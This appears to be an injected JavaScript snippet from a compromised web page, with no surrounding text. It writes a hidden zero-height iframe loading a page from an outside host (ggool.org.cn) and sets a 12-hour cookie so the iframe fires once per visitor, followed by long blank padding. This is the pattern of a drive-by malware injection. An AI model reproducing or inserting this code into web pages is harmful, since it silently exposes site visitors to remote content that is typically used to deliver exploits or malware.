var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9C4A4C5EBF042D02' ;
Then.setTime(Then.getTime() + 12*60*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
   {
document.write('<iframe src=http://ggool.org.cn/29.htm width=50 height=0></iframe>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
   }




















